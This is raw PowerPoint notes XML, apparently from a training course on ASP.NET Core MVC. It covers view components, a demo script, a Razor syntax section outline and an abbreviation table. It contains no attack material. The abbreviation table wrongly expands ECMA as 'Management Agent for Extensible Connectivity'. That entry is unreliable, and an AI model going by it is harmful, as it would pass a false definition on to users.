            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>[ViewComponent]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute above tells the view component selector to use the name </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>PriorityList</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> when looking for the views associated with the component, and to use the string “PriorityList” when referencing the class component from a view. This will be discussed in more detail later.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The component uses constructor injection to make the data context available.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Invoke exposes a method which can be called from a view, and it can take an arbitrary number of arguments. An asynchronous version, InvokeAsync, is available. We will see InvokeAsync and multiple arguments later in the tutorial. In the code above, the Invoke method returns the set of ToDoItems that are not completed and have priority greater than or equal to maxPriority.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1048677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lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>View Component</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>must</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> be named </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. View Component views are more typically added to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>Views\Shared\Components</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> folder, because view components are typically not controller specific.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32576792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b="1" dirty="0"/>
              <a:t>Note: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IQueryable renders the sample synchronous, and not asynchronous. This is a simple example of how you could call asynchronous methods.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6806997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b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="171442" indent="-171442"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Create a simple view component and show how to use</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" baseline="0" dirty="0"/>
              <a:t> it in a Razor view.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://docs.microsoft.com/en-us/aspnet/core/mvc/views/view-components?view=aspnetcore-3.1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>OR </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="114000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzPct val="116000"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" dirty="0">
                <a:latin typeface="Segoe UI Light" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Demo script on the next slide.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="508242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b="1" dirty="0"/>
              <a:t>Section Overview:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This section discusses the following topics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand Razor syntax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>How to protect your website with Html Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Code Blocks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html Encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Html Helpers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Layout and Sections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Display and Editor Templates</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tag Helpers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>View Components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4079268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73CFBB7B-29F3-4A9F-B039-645092B1B4E9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Image Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Notes Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Abbreviation list:</a:t>
            </a:r>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899194322"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="533400" y="4191000"/>
          <a:ext cx="4572000" cy="333756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65421489"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3200400">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="215720394"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Abbreviation</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>What it means</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="826649952"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>AAC</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Advanced Audio Coding</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2386826384"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>DOM</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Document Object Model</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2169670375"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ECMA</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Management Agent for Extensible Connectivity</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1444506991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MVC</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Model</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" baseline="0" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> View Controller</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="105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379675112"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>SVG</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Scalable Vector Graphics</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3703930811"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>TTT</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Time Travel</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" baseline="0" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Tracing</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="105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264357787"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>W3C</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>World Wide Web Consortium</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2617561270"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1050" dirty="0">
                          <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cross-Site Scripting</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3736237671"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14173451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pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3160160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pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26363727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pPr/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41785763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89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384175" y="484188"/>
            <a:ext cx="6096000" cy="3429000"/>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167141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dirty="0"/>
              <a:t>Compare the simplified code syntax in the slide section with that of the following web forms syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;% int[] items = new int[] {1, 2, 3, 4, 5}; %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
